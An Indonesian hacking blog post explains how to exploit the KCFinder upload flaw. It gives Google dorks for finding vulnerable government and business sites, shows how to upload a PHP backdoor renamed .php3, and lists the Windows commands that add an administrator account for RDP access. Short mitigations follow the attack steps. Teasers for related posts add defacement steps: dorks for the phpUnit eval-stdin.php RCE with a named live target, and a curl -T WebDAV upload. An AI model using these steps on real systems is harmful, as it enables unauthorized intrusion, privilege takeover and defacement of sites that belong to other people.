Skip to main content

Celah KCFinder

KCFinder adalah salah satu plugin populer untuk web file management yang biasa diintegrasikan dengan editor tinymce, ckeditor dan masih banyak lagi yang biasa digunakan oleh para web master. Celah keamanan ini bahkan sampai di versi yang paling baru. Cek di http://kcfinder.sunhater.com untuk lihat. Sebenarnya ini bukanlah hal yang baru, tapi sebagian admin yang jarang update info banyak juga yang kena batunya. Saya sendiri masih mendapati beberapa instansi pemerintah, lembaga pendidikan, perusahaan dalam negeri yang berpotensi diserang dengan bug ini.
Bagaimana cara dapatnya?
Simpel saja, saya gunakan mata omm google yang tembus pandang untuk melihat target. Google dorknya
inurl: index of/kcfinder/browse.php site:.co.id
Di atas hanya contoh ya… setelah itu, kita tinggal upload file backdoornya. Sebagian server memproteksi dengan mereject file PHP. Jadi kita main kucing-kucingan saja. Itu file backdoor kita ganti ekstensinya dari .php ke .jpg atau .php3. Tapi yang praktis .php3. Setelah di upload, cek lokasi filenya. Terus silakan eksekusi. Nah lhooo… kita sudah dapat semua direktorinya
Terus bagaimana lagi?
Rasanya kok setengah-setengah untuk lihat file. Saya harus naik tingkat. jadi saya pake command ini untuk buat user baru di server:
net user namauser passwordnya /add
net localgroup administrators namauser /add
Command di atas hanya untuk windows. Nah setelah itu bagaimana lagi? Biasanya server windows itu diaktifkan remote destop connectionnya. Kita pake itu saja. Sgera tekan windows+r, ketik MSTSC <enter>. masukkan ip server target tadi. masukkan juga user dan password yang sudah kita buat. OK Finish. Full Aksessssss. Gampang kan..
Bagaimana cara proteksinya?
Yang pertama adalah file config.php di folder kcfinder perlu di edit. Lihat baris 51
deniedExts’ => “exe com msi bat php phps phtml php3 php4 cgi pl”,
(hilangkan tanda koma atas di depan untuk mengaktifkan proteksi filenya)
Cara kedua adalah dengan membuat penghalang direct access, misalnya dengan mendefiniskan session di halaman awal seperti di bawah
define( ‘UNE’, 1 );
kemudian di halaman kcfinder ditambahkan script
defined(‘UNE’) or die(‘Restricted access’);
Kata UNE itu hanya variabel bebas, anda bisa ganti semaunya. Nama saya juga boleh kok. Cara ketiga dengan proteksi htaccess dan membatasi pengupload. Cara keempat kalau tidak mau repot, ya jangan pake kcfinder 🙂
demikian penjelasan saya, mudah-mudahan para admin pada cepat respon. Dan bagi yang temukan, tolong jangan iseng ya… Kasih tahu adminnya kalau kamu memang dapatkan bugnya. Ilmu itu bukan untuk merusak, tapi memperbaiki. OK.

Comments

Post a Comment

Popular posts from this blog

Tutorial deface POC Laravel phpUnit UPLOAD SHELL

Tutorial deface POC Laravel phpUnit UPLOAD SHELV Setelah sekian lama kami tidak update seputar deface kali ini kami akan berbagi tutorial tentang  Laravel phpUnit UPLOAD SHELL.        Teknik yang satu ini memanfaatkan sebuah bug dari Fitur yang di sediakan oleh pengguna laravel yaitu php unit dengan cara menggunakan remote code execution (RCE) Tutorial / Cara Upload Shell Metode Laravel phpUnit to RCE( Remote Code Execution ) dengan BurpSuite Pertama siapkan : - BurpSuite ( download di google banyak ) - Browser Dorking di google : - inurl:vendor/phpunit/phpunit/src/ - inurl:/src/Util/PHP/ intitle:index of - inurl:/Util/PHP/ "eval-stdin.php" * kembangin lagi biar dapet target lebih fresh Exploit : /eval-stdin.php site.co.li/vendor/phpunit/phpunit/src/Util/PHP/eval.stdin.php * kalau blank putih berarti vuln Oke langsung aja, disini gua udh dapet targetnya : http://www.olapcemetery.com//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin...
Post a Comment
Read more

Cara deface poc webdav di termux

HELLO ALL ^_^ KAMI AKAN MENSHARE CARA DEFACE DENGAN TERMUX Bahan bahan -dork vuln -termux (ada di playstore) Cara untuk pasang curl -apt upgrade -apt update -pkg install curl Pindahkan script kalian di penyimpanan internal dan jangan di folder letak kan di luar Sesudah itu lalu ketikan Liat target nya home nya di index.html atau di index.htm Cara nya tinggal nambah di belakang url www.target.co.za menjadi www.target.co.za/index.html atau /index.htm Lalu ketikan curl -T /storage/emulated/0/index.html TARGET Contoh:curl -T /storage/emulated/0/index.html www.nicestuff.co.za
Post a Comment
Read more

6 Serangan Hacker Terhebat Di Dunia

Perkembangan dunia internet yang semakin pesat dan sangat dibutuhkan pada saat ini, memiliki dampak yang memunculkan para jenius teknologi mengembangkan serangan dunia maya atau Cyber Attack. Serangan melalui dunia maya ini makin dikenal masyarakat awam ketika marak munculnya jenis serangan Wanna Cry yang melibatkan perusahaan besar di dunia sebagai korban pemerasan. Pengertian Serangan Cyber Serangan cyber adalah eksploitasi yang disengaja terhadap sistem komputer. Serangan ini biasanya ditujukan pada perusahaan besar yang bergantung pada teknologi dan jaringan. Serangan ini menggunakan kode yang dapat mengubah kode komputer, logika atau data yang mengakibatkan konsekuensi yang mengganggu serta membahayakan data. Serangan cyber ini disebut juga serangan pencurian data, informasi dan identitas, karena tujuan para penyerang adalah menukarkan data dengan sejumlah uang. Serangan cyber dipecah menjadi dua jenis besar tergantung pada tujuan penyerang. Pertama adalah ...
Post a Comment
Read more